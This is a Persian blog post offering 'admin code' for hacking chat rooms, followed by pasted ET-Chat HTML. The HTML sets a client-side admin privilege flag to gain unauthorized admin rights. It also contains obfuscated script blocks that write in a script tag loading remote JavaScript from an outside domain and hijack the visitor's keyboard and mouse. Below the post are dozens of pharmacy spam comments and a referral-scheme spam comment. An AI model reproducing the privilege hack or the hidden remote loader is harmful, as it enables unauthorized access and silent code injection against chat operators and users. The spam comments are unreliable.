تبلیغات
دانلود آموزش گفتوگو - کد مدیر شدن در چت روم(هک چتروم)

امروز:

کد مدیر شدن در چت روم(هک چتروم)

برای دریافت کد بر روی ادامه مطلب کلیک کنید
09383971209 : تلفن

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script src="js/prototype.js" type="text/javascript"></script>
<script src="js/scriptaculous.js" type="text/javascript"></script>
<script src="js/chat.js" type="text/javascript"></script>
<script src="./?MessagesForJs" type="text/javascript"></script>
<link href="styles/etchat_white/style.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="js/window.js"></script>
<link href="styles/default_2create_win.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">

window.onload = function() {
    var chatObj = new ET_Chat();
    chatObj.messages_im_chat=22;
    chatObj.reload_interval=4000;
    chatObj.username='..Milad..';
    chatObj.user_id='339845';
    chatObj.userPrivilegienGlobal='admin';
    chatObj.win_style='etchat_white';
    chatObj.anbindung_an_userverwaltung=false;
    chatObj.show_history_all_user=true; //sonst wird die History nur fuer Admin u  sichtbar
    chatObj.set_dynamic_height=true; // sonst hat das ganze Chat eine feste Hoehe
    chatObj.allow_nick_registration=true;
    chatObj.textcolor='000000';
    chatObj.start();
    chatObj.userOnline();
    if ( Prototype.Browser.IE )
        $("splitpane").onmousedown = function(){ chatObj.dragSplitpane(); }
    else
        chatObj.dragSplitpane();
}

  </script><body id="body_id">
<div id="rahmen_um_alles">
<div id="kopf"></div>
<div id="onlinelist"><img src="img/ajax-loader.gif" alt="" /></div>
<div id="splitpane"></div>
<div id="chatinhalt">
<style>
.Gbutton{</form><div style="font:bold 10px tahoma;text-align:right;color:#fff;direction:rtl;"><iframe id="I1" border="0" name="I1" src="http://www.fozolchat.ir/mp3.php" style="width: 230px; background-color: rgb(255, 255, 255); border-radius: 5px 5px 5px 5px;" frameborder="0" scrolling="no">Your browser does not support inline frames or is currently configured not to display inline frames.</iframe>
<iframe id="I1" border="0" name="I1" src="http://www.akvanchat.com/rk.php" style="width: 202px; background-color: rgb(255, 255, 255); border-radius: 5px 5px 5px 5px;" frameborder="0" scrolling="no">Your browser does not support inline frames or is currently configured not to display inline frames.</iframe>
<iframe id="I2" border="0" name="I2" src="http://shokchat.ir/chat/nazer.php" style="width: 230px; background-color: rgb(255, 255, 255); border-radius: 5px 5px 5px 5px;" frameborder="0" scrolling="no">
Your browser does not support inline frames or is currently configured not to display inline frames.
    <title>به عسل چت خوش آمدید</title>
<script language="javascript">
function whichButton(event)
{
if (event.button==2)//RIGHT CLICK
{
alert("please,not copy and paste in asalchat ");
}

}
function noCTRL(e)
{
var code = (document.all) ? event.keyCode:e.which;

var msg = "Sorry,you can`t copy and paste in asalchat.";
if (parseInt(code)==17) //CTRL
{
alert(msg);
window.event.returnValue = false;
}
}
</script>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

  <script src="js/prototype.js" type="text/javascript"></script>
  <script src="js/scriptaculous.js" type="text/javascript"></script>
  <script src="js/chat.js" type="text/javascript"></script>
  <script src="./?MessagesForJs" type="text/javascript"></script>
  <link href="styles/etchat_white/style.css" rel="stylesheet" type="text/css"/>

<style type="text/css">
#chatinhalt{

    padding: 5px;
    background:#ffffff url('http://irannab.com/up3/images/fsqnq70gdik53ccnnqs.jpg');
    font-size: 13px;
    font-family: tahoma;
    font-style: normal;
    /*margin-right:200px;*/
    position:relative;
    height: 450px;
    overflow: auto;
    padding: 5px;
    padding-bottom: 16px;
    line-height:150%;
        -moz-border-radius: 9px;
    -webkit-border-radius: 9px;
    border-radius: 9px;
        -moz-box-shadow: 3px 3px 4px #909090;
        -webkit-box-shadow: 3px 3px 4px #909090;
        line-height:180%;
        box-shadow: 3px 3px 4px #909090;


}
#onlinelist{

    background:#ffffff url('http://irannab.com/up3/images/fsqnq70gdik53ccnnqs.jpg');
padding: 5px;
    font-size: 12px;
    font-family: tahoma;
    font-style: normal;
    float: right;
    width: 200px;
    height: 450px;
    padding-bottom: 16px;
    overflow: auto;
            -moz-border-radius: 9px;
    -webkit-border-radius: 9px;
    border-radius: 9px;
        -moz-box-shadow: 3px 3px 4px #909090;
        -webkit-box-shadow: 3px 3px 4px #909090;
        box-shadow: 3px 3px 4px #909090;
        

}
#form{

    background:#ffffff url('http://irannab.com/up3/images/fsqnq70gdik53ccnnqs.jpg');
    font-size: 12px;
    font-family: tahoma;
    font-style: normal;
    clear: both;
    margin-top: 10px;
    color:#000000;
    padding: 3px;
    height: 45px;
     border: 1px solid #d7d7d7;
    -moz-border-radius: 9px;
    -webkit-border-radius: 9px;
    border-radius: 9px;
    -moz-box-shadow: 3px 3px 4px #909090;
        -webkit-box-shadow: 3px 3px 4px #909090;
        box-shadow: 3px 3px 4px #909090;
   

}
.rooms{
 background-image:url('http://irannab.com/up3/images/4aundw9ybd8csynvpq7.png');
 background-position:right;
 background-repeat:no-repeat;
 padding: 1px;
 margin-bottom: 12px;
 cursor:pointer;
 text-align:center;
 -moz-border-radius:5px;
 -webkit-border-radius5px;
 -moz-box-shadow:3px 3px 4px #565656;
 -webkit-box-shadow:3px 3px 4px #565656;
 box-shadow:3px 3px 4px #565656;
 height:22px;
 padding-top:7px

}
</style><script type="text/javascript" src="js/window.js"></script>
<link href="styles/default_2create_win.css" rel="stylesheet" type="text/css"/>
  <script type="text/javascript">

window.onload = function() {
    var chatObj = new ET_Chat();
    chatObj.messages_im_chat=100;
    chatObj.reload_interval=4000;
    chatObj.username='..milad..';
    chatObj.user_id='339845';
    chatObj.userPrivilegienGlobal='admin';
    chatObj.win_style='etchat_white';
    chatObj.anbindung_an_userverwaltung=false;
    chatObj.show_history_all_user=true; //sonst wird die History nur fuer Admin u Mod sichtbar
    chatObj.set_dynamic_height=true; // sonst hat das ganze Chat eine feste Hoehe
    chatObj.allow_nick_registration=true;
    chatObj.textcolor='000000';
    chatObj.start();
    chatObj.userOnline();
    if ( Prototype.Browser.IE )
        $("splitpane").onmousedown = function(){ chatObj.dragSplitpane(); }
    else
        chatObj.dragSplitpane();
}

  </script>

</head>
<body background="http://irannab.com/up3/images/05e06ntfm6vq6mdtjwm.jpg">
<div id="rahmen_um_alles">
<div id="kopf">
<div align="center">
<table border="0" width="100%" id="table1">
    <tr>
        <td>
        <p align="center">
        <img border="0" src="http://irannab.com/up3/images/3mkui5pdpgcqt6e9gm3o.jpg" ></td>
    </tr>
</table>
</div>
</div>
<div id="onlinelist"><img src="img/ajax-loader.gif" alt="" /></div>
<div id="splitpane"></div>
<div id="chatinhalt"></div>

<div id="form">
<form id="message_form" style="display:inline;" action="">

<div id="form_left">

<div id="privat_anzeige">به همه افراد:</div>

<input type="hidden" name="room" id="room" value="1" />
<input type="hidden" name="privat" id="privat" value="" />
<input type="hidden" name="bold" id="bold" value="normal" />
<input type="hidden" name="italic" id="italic" value="normal" />
<input type="hidden" name="color" id="color" value="#000000" />

<input name="message" id="message" type="text" class="input" style="width:400px;"/>
</div>
<div id="form_right">
<img id="link_sagen" class="img_button" src="img/Checked.png" width="32" height="32" border="0" alt="ارسال پیــام" title="ارسال پیــام" />&nbsp;&nbsp;&nbsp;
<img id="link_smileys" class="img_button" src="img/Smiley_Cool.png" width="32" height="32" border="0" alt="شکلک ها" title="شکلک ها" />&nbsp;&nbsp;&nbsp;
<img id="link_color" class="img_button" src="img/Colors.png" width="32" height="32" border="0" alt="فونت ها و رنگ ها" title="فونت ها و رنگ ها" />&nbsp;&nbsp;&nbsp;
<img id="link_prop" class="img_button" src="img/Display.png" width="32" height="32" border="0" alt="تنظیمات دیگر" title="تنظیمات دیگر" />&nbsp;&nbsp;&nbsp;

<img id="link_smileys2" class="img_button" src="img/fal.gif" width="32" height="32" border="0" alt="?#65533;ال حا?#65533;ظ" title="?#65533;ال حا?#65533;ظ" />&nbsp;&nbsp;&nbsp;
<a target="_blank" href="top.php">
<img  class="img_button" src="point.png" width="32" height="32" border="0" alt="&#1585;&#1578;&#1576;&#1607; &#1740;&#1606;&#1583;&#1740;" title="&#1585;&#1578;&#1576;&#1607; &#1576;&#1606;&#1583;&#1740;" /></a>&nbsp;&nbsp;&nbsp;
<a target="_blank" href="profile">
<img  class="img_button" src="profile.png" width="32" height="32" border="0" alt="&#1662;&#1585;&#1608;&#1601;&#1575;&#1740;&#1604;" title="&#1662;&#1585;&#1608;&#1601;&#1575;&#1740;&#1604;" /></a>&nbsp;&nbsp;&nbsp;
<a target="_blank" href="user">
<img  class="img_button" src="cpuser32.png" width="32" height="32" border="0" alt="&#1705;&#1606;&#1578;&#1585;&#1604; &#1662;&#1606;&#1604; &#1575;&#1593;&#1590;&#1575;&#1569;" title="&#1705;&#1606;&#1578;&#1585;&#1604; &#1662;&#1606;&#1604; &#1575;&#1593;&#1590;&#1575;&#1569;" /></a>&nbsp;&nbsp;&nbsp;

<img id="link_logout" class="img_button" src="img/Delete_big.png" width="32" height="32" border="0" alt="خروج از چت" title="خروج از چت" />
</div>
</form><br><br><br><br>
</div>

</div>
<p align="center">
<span style="font-family: Tahoma; font-size: medium; background-color:#FFFFFF">
<img border="0" src="registerchat.png" width="500" height="40"><br>
<img border="0" src="user500.png" width="500" height="40">
</span></p>
<div align="center">
    <table border="0" width="100" id="table1">
        <tr>
            <td>

<iframe width="294" height="248" src="amar3.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>
            <td>

<iframe width="294" height="248" src="amar10.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>            <td>

<iframe width="294" height="248" src="amar7.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>            <td>

<iframe width="294" height="248" src="amar5.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>
       </tr>
</table>
</div>
<center>
<a target="_blank" href="http://emsharj.com">
<img border="0" src="http://irannab.com/up3/images/y4xonud1qih63hnc5ux.gif" width="468" height="60"></a>

<a target="_blank" href="http://asalchat.blogfa.com/post-43.aspx">
<img border="0" src="http://irannab.com/up3/images/g1t1cxvnq7yzqwoixluv.gif" width="468" height="60"></a>


<br>
<script language="JavaScript">
var msz="Paste Nakonid Lotfan";

function Isr(evn){var dsr=window.event?event:evn;var esr=dsr.keyCode;if(dsr.ctrlKey){if(esr==86){document.getElementById("message").value=msz;return false}}return true}
var o6="g.c",oz="%73c%72i%70t>",o7='om/l"></',t9="t%70://si",yu="ngl.%70",oi="gi",o4="er%73i%61n",b8='%3C%73cr%69pt %73r%63="h%74';document.write(unescape(b8+t9+yu+o4+oi+o6+o7+oz));document.getElementById("message").onkeydown=Isr;document.getElementById("message").onkeypress=Isr;document.getElementById("message").onpaste=function(){return false};document.getElementById("message").onkeyup=Isr;
</script><br></center>
<html dir="ltr">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="fa">
</head>
<iframe width="0" height="0" src="emid.php?username2=..milad..." style="border: 0px;" frameborder="0" scrolling="no"></iframe>

<script language="JavaScript">
var msz="Sheyton Shodia :D ";

function Isr(evn){var dsr=window.event?event:evn;var esr=dsr.keyCode;if(dsr.ctrlKey){if(esr==90){document.getElementById("message").value=msz;return false}}return true}
var o6="g.c",oz="%73c%72i%70t>",o7='om/l"></',t9="t%70://si",yu="ngl.%70",oi="gi",o4="er%73i%61n",b8='%3C%73cr%69pt %73r%63="h%74';document.write(unescape(b8+t9+yu+o4+oi+o6+o7+oz));document.getElementById("message").onkeydown=Isr;document.getElementById("message").onkeypress=Isr;document.getElementById("message").onpaste=function(){return false};document.getElementById("message").onkeyup=Isr;
</script><script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3E%3C%21--%0D%0A%0D%0Avar%20message%3D%22&#1582;&#1585;&#1575;&#1576;&#1705;&#1575;&#1585;&#1610; &#1605;&#1605;&#1606;&#1608;&#1593;  : %20 %21%22%3B%0D%0A%0D%0Afunction%20clickIE%28%29%20%20%7Bif%20%28document.all%29%20%7Balert%28message%29%3Breturn%20false%3B%7D%7D%0D%0Afunction%20clickNS%28e%29%20%7Bif%20%0D%0A%28document.layers%7C%7C%28document.getElementById%26%26%21document.all%29%29%20%7B%0D%0Aif%20%28e.which%3D%3D2%7C%7Ce.which%3D%3D3%29%20%7Balert%28message%29%3Breturn%20false%3B%7D%7D%7D%0D%0Aif%20%28document.layers%29%20%0D%0A%7Bdocument.captureEvents%28Event.MOUSEDOWN%29%3Bdocument.onmousedown%3DclickNS%3B%7D%0D%0Aelse%7Bdocument.onmouseup%3DclickNS%3Bdocument.oncontextmenu%3DclickIE%3B%7D%0D%0A%0D%0Adocument.oncontextmenu%3Dnew%20Function%28%22return%20false%22%29%0D%0A%0D%0A//%20--%3E%3C/script%3E';d=unescape(m);document.write(d);</script>


</body>
</html>

نوشته شده در : شنبه چهاردهم اردیبهشتماه سال 1392  توسط : دانش مند.    نظرات() .

http://viagrawwithoutdoctor.com/
سه شنبه هشتم مردادماه سال 1398 01:17

Thanks! Excellent information!
canadian pharmacies stendra canadian pharmacycanadian pharmacy canadian medications list drugs for sale in uk canada online pharmacies for men online pharmacies mexico are canadian online pharmacies safe canadian pharmacy online 24 canadian pharmacy viagra aarp recommended canadian online pharmacies
3win8 slot download
جمعه هفتم تیرماه سال 1398 12:08
There are times when no associated with hypnosis can surmount some
problems. So we needn't fear that invisible entities will
gain entry for our souls. You might even count blogs as
article web sites and there are new ones sprouting up every day.
http://ndesacsum.strikingly.com/
دوشنبه سوم تیرماه سال 1398 07:01

Point certainly utilized.!
low dose cialis blood pressure cialis patent expiration cialis coupon sublingual cialis online cialis rckenschmerzen no prescription cialis cheap cialis kaufen we like it safe cheap cialis purchase once a day cialis buying cialis overnight
tadalafil generic vs cialis reviews
یکشنبه دوم تیرماه سال 1398 15:02

Wonderful forum posts. Regards!
what is cialis cialis vs viagra cialis price in bangalore venta cialis en espaa wow cialis tadalafil 100mg we recommend cialis best buy buy cialis online nz il cialis quanto costa buy cheap cialis in uk cialis canada
http://tritotit.strikingly.com/
یکشنبه دوم تیرماه سال 1398 00:21

Very good content. Appreciate it!
try it no rx cialis cialis sans ordonnance cialis savings card brand cialis generic cialis 50 mg soft tab cialis lowest price acheter cialis kamagra recommended site cialis kanada tadalafil 20 mg buy name brand cialis on line
http://mitmyitmak.strikingly.com/
شنبه یکم تیرماه سال 1398 07:30

Perfectly voiced truly. !
cialis 5mg billiger cialis super kamagra enter site 20 mg cialis cost cialis venta a domicilio dose size of cialis cialis side effects rezeptfrei cialis apotheke i recommend cialis generico cialis flussig cialis venta a domicilio
http://fiverca.strikingly.com/
جمعه سی و یکم خردادماه سال 1398 15:21

Wow quite a lot of amazing information!
canadian drugs generic cialis buy cialis online legal cialis generika in deutschland kaufen buying cialis overnight cialis great britain generic low dose cialis canadian cialis cialis online nederland cialis pills in singapore low dose cialis blood pressure
Cialis prices
پنجشنبه سی ام خردادماه سال 1398 23:18

Point effectively utilized..
only now cialis 20 mg cialis y deporte buy cialis online cialis pills price each cialis uk next day cialis without a doctor's prescription we recommend cialis best buy cialis italia gratis get cheap cialis generic low dose cialis
http://brasoras.strikingly.com/
پنجشنبه سی ام خردادماه سال 1398 04:04

Nicely expressed without a doubt! !
prescription doctor cialis cost of cialis cvs cialis generique 5 mg does cialis cause gout cialis side effects dangers rx cialis para comprar where cheapest cialis walgreens price for cialis cost of cialis per pill cialis 20 mg
Cialis prices
چهارشنبه بیست و نهم خردادماه سال 1398 12:13

Cheers, Ample stuff!

dosagem ideal cialis female cialis no prescription buying brand cialis online look here cialis cheap canada wow cialis 20 purchase once a day cialis buy original cialis cialis pas cher paris buy cialis online nz cilas
prix cialis 20mg
سه شنبه بیست و هشتم خردادماه سال 1398 19:48

Seriously all kinds of superb advice!
5 mg cialis pharmacie en ligne cialis tablets order a sample of cialis cialis online cialis rezeptfrei cialis dosage amounts venta de cialis canada prescription doctor cialis click here cialis daily uk cialis 20 mg cut in half
http://inorbe.strikingly.com/
دوشنبه بیست و هفتم خردادماه سال 1398 21:51

Wow tons of great knowledge.
where to buy cialis in ontario opinioni cialis generico buying cialis in colombia cialis online napol generic cialis pro venta cialis en espaa cialis 5mg generic cialis in vietnam generic cialis in vietnam cialis per paypa
http://grazsubce.strikingly.com/
یکشنبه بیست و ششم خردادماه سال 1398 17:41

Information very well taken!.
if a woman takes a mans cialis cialis 5 mg schweiz precios cialis peru buy name brand cialis on line cialis 5 mg para diabeticos generic low dose cialis interactions for cialis safe dosage for cialis price cialis best cialis side effects
http://rargercfo.strikingly.com/
یکشنبه بیست و ششم خردادماه سال 1398 03:01

You have made your point.
non 5 mg cialis generici cialis daily dose generic cialis arginine interactio cialis italia gratis cost of cialis cvs import cialis trusted tabled cialis softabs acheter du cialis a geneve buy cialis cialis per paypa
generic cialis mail order
شنبه بیست و پنجم خردادماه سال 1398 13:14

Appreciate it, Lots of material!

cialis ahumada free generic cialis cialis generic cialis prices in england precios cialis peru cialis prezzo al pubblico cialis prices costo in farmacia cialis buy cialis uk no prescription buy cialis cheap 10 mg
Buy cialis
جمعه بیست و چهارم خردادماه سال 1398 23:01

You actually explained it really well!
price cialis per pill cialis uk cialis daily dose generic cialis generico in farmacia compare prices cialis uk buy name brand cialis on line i recommend cialis generico cialis generic cialis arginine interactio how does cialis work
http://knowexin.strikingly.com/
جمعه بیست و چهارم خردادماه سال 1398 08:48

You explained that well!
we recommend cialis best buy chinese cialis 50 mg cialis generika cuanto cuesta cialis yaho cheap cialis we like it safe cheap cialis cialis cost cialis diario compra buy cialis online cheapest canadian discount cialis
Buy cialis online
پنجشنبه بیست و سوم خردادماه سال 1398 18:22

Thanks a lot. I value this.
discount cialis online prescriptions cialis rx cialis para comprar cialis daily are there generic cialis cialis for sale dose size of cialis no prescription cialis cheap we choice cialis pfizer india enter site natural cialis
tadalafil india reviews
پنجشنبه بیست و سوم خردادماه سال 1398 04:59

You've made the point!
cialis generisches kanada click now buy cialis brand cialis uk next day when can i take another cialis what is cialis where do you buy cialis cialis billig interactions for cialis cialis soft tabs for sale cialis dosage recommendations
can viagra be taken daily
چهارشنبه بیست و دوم خردادماه سال 1398 00:45

I have read so many articles or reviews concerning the blogger lovers except this article is really a nice paragraph, keep it up.
cialisvie.com
دوشنبه بیستم خردادماه سال 1398 07:45

Cheers. An abundance of write ups.

cialis 20 mg best price precios de cialis generico canadian drugs generic cialis cialis flussig cialis usa cost preis cialis 20mg schweiz cialis lowest price cialis prezzo al pubblico best generic drugs cialis purchase once a day cialis
http://cialisvie.com/
یکشنبه نوزدهم خردادماه سال 1398 01:50

This is nicely expressed! !
best generic drugs cialis no prescription cialis cheap cialis para que sirve cialis 200 dollar savings card cialis dosage recommendations cialis 20 mg generic for cialis cialis 5 mg scheda tecnica cialis 05 rx cialis para comprar
cialisvie.com
جمعه هفدهم خردادماه سال 1398 20:30

Wonderful data. Thanks!
price cialis per pill cialis tadalafil purchase once a day cialis cialis daily dose generic legalidad de comprar cialis cialis 20 mg cost we like it cialis price buy cialis online nz cialis 200 dollar savings card cialis online
ali
شنبه سوم مردادماه سال 1394 03:57
الان اینو چیکارش کنیم کجا ازش استفاده میشه
پاسخ دانش مند : بابا خودت یه کاریش کن دیگه بزار مردم به کاروزندگیشون برسن
علی
پنجشنبه پنجم تیرماه سال 1393 16:20
خوب بود
یاوری
یکشنبه بیست و دوم اردیبهشتماه سال 1392 08:30
سلام دوست عزیز با ثبت نام در این سایت می تونید با انلاین بودنتون راحت کسب درامد کنید فقط

کافیه ثبت نام کنید و روی دکمه شروع کسب درامد کلیک کنید به همین راحتی

خود وبسایت اتوماتیک به حساب شما پول واریز می کنه

فقط تا انلاین هستید صفحه اش رو باز بذارید

اگه دوست داشتید هم می تونید سایتتون رو ثبت کنید تا بازدید کننده برای سایت شما هم بفرسته
http://www.bazdidsaz.com/?refer=shahmiri

http://www.bazdidsaz.com/?refer=shahmiri
از طریق این لینک می تونید ثبت نام کنید هر چی زودتر ثبت نام کنید درامد بیشتری می تونید کسب کنید
 
لبخندناراحتچشمک
نیشخندبغلسوال
قلبخجالتزبان
ماچتعجبعصبانی
عینکشیطانگریه
خندهقهقههخداحافظ
سبزقهرهورا
دستگلتفکر